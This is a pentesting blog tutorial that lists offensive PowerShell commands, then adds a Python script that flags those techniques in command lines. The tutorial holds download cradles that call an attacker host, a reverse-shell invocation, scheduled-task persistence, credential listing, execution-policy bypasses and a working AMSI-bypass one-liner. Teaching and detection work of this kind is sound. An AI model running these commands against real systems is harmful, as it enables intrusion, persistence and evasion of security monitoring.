PowerShell for Pentesters: What You Need to Know
PowerShell is one of the most powerful tools in a pentester’s Windows toolbox. If you’re targeting a Windows environment — and let’s be real, you will be — you need to understand PowerShell not just as a scripting language, but as a full-blown post-exploitation Swiss Army knife.
In this post, we’re skipping the theory-heavy stuff. You already know PowerShell is important. We’re going to look at how it works (very briefly), then jump into the real meat: the commands and scripts every pentester should have in their toolkit.
Very Quick: How PowerShell Works
PowerShell is a command-line shell and scripting language built on .NET. It’s designed for system administration and automation. The key things to know:
- It lets you interact with the Windows OS and its components (like the registry, services, and event logs).
- It can run scripts, download payloads, modify settings, and pull system information — all from the terminal.
- Scripts can run entirely in memory without touching disk, which is why red teams favor it for stealth.
PowerShell Commands and Techniques for Pentesters
Let’s get into what you’re really here for — the techniques, commands, and scripts that you’ll actually use during your engagements.
1. Recon & Enumeration
Get System Info
systeminfo
Basic but useful. Shows OS version, hotfixes, system uptime, etc.
Who’s Logged In?
query user
Get Local Users
Get-LocalUser
Check Group Membership
Get-LocalGroupMember -Group "Administrators"
Environment Variables
Get-ChildItem Env:
Network Info
ipconfig /all
Get-NetIPConfiguration
Get-NetTCPConnection
Running Processes
Get-Process
2. File & Directory Interaction
List Files and Folders
Get-ChildItem -Force
Read a File
Get-Content .\filename.txt
Search for Keywords (Passwords, Keys, etc.)
Select-String -Path *.txt -Pattern "password"
Download a File from the Internet
Invoke-WebRequest -Uri "http://attacker.com/file.exe" -OutFile "file.exe"
Or:
(New-Object System.Net.WebClient).DownloadFile("http://attacker.com/file.exe", "file.exe")
3. Lateral Movement & Execution
List Network Shares
net view \\TARGET
List Sessions on Remote System
quser /server:TARGET
Execute Remote Command with WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c calc.exe" -ComputerName TARGET
PsExec-Style Alternative (PowerShell Remoting)
Invoke-Command -ComputerName TARGET -ScriptBlock { whoami }
4. Persistence Techniques
Add a Script to Startup Folder
Copy-Item "payload.ps1" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\payload.ps1"
Scheduled Task
schtasks /create /tn "Updater" /tr "powershell.exe -ExecutionPolicy Bypass -File payload.ps1" /sc minute /mo 1
5. Credential Dumping & User Info
Check for Stored Credentials
cmdkey /list
Get Wi-Fi Passwords
netsh wlan show profile name="WiFiName" key=clear
Enumerate SAM & LSA
You’ll need SYSTEM privileges and tools like mimikatz, but this is where PowerShell shines for delivery and execution.
6. Payload Execution In-Memory
Run Encoded Script
powershell.exe -EncodedCommand [base64payload]
Bypass Execution Policy
powershell.exe -ExecutionPolicy Bypass -File script.ps1
Or inline:
powershell -ep bypass -Command "Invoke-WebRequest ..."
PowerShell Scripts Every Pentester Should Know
1. PowerView
Recon tool for AD environments. Part of PowerSploit.
- Enumerate domains, users, groups, shares, sessions.
- Example:
Import-Module .\PowerView.ps1
Get-NetUser
2. PowerUp
Privilege escalation tool for local enumeration.
Import-Module .\PowerUp.ps1
Invoke-AllChecks
3. Nishang
A collection of offensive PowerShell scripts.
Examples:
- Reverse shell: Invoke-PowerShellTcp
- Download & Execute: Invoke-DownloadExecute
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444
4. PowerShell Empire (Agent Scripts)
A full C2 framework. You don’t need to run the full Empire server — even just understanding the generated agent scripts is useful for custom payloads.
Bypassing Defenses
PowerShell is heavily monitored now by AV and EDR. Some common evasion techniques:
- Use encoded payloads (-EncodedCommand)
- Load scripts into memory (IEX (New-Object Net.WebClient).DownloadString(...))
- Avoid writing to disk when possible
- Use AMSI bypasses (with caution):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
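Every technique in Section 6 and in this section leaves a command line behind, so here is the flip side: an added Python example (not code from the original post) that decodes -EncodedCommand payloads and flags the download-cradle, IEX, AMSI-tampering and execution-policy-bypass indicators in constructed command-line samples. The indicator names, regexes and sample lines are assumptions made for this example, not a vendor's detection rules.

```python
import base64
import re

# Indicator patterns (constructed for this example) matching the tradecraft the
# post lists: download cradles, in-memory execution, AMSI tampering, policy bypass.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "amsi_tamper": re.compile(r"amsiInitFailed|AmsiUtils", re.I),
    "exec_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.I),
}
# -EncodedCommand and its common short forms (-e, -ec, -enc) take UTF-16LE base64.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: still worth eyes-on, but don't crash

def triage(cmdline):
    """Return the sorted indicator names a command line hits, decoding first."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if decoded is not None:
        hits.add("encoded_command")
    return sorted(hits)

def to_encoded_command(script):
    """Build the UTF-16LE base64 form powershell.exe expects (used for samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines, not real telemetry (example.invalid is a reserved TLD).
SAMPLES = [
    'powershell.exe -ExecutionPolicy Bypass -File script.ps1',
    "powershell -ep bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
    "powershell.exe -EncodedCommand " + to_encoded_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/y')"),
    'powershell.exe -Command "[Ref].Assembly.GetType(\'System.Management.Automation.AmsiUtils\')"',
    'powershell.exe -Command "Get-Process"',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage(s) or ["no indicators"], "<-", s[:70])
```

Feed it the command-line field of 4688 or 4104-style events and the encoded payload gets the same scrutiny as a plain one.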
Final Thoughts
PowerShell gives you direct access to the beating heart of a Windows system. Whether you’re enumerating users, escalating privileges, or moving laterally across a network — PowerShell lets you do it quietly and efficiently.
But remember: with great power comes great detection. Learn it. Practice it. Obfuscate it. Master it.
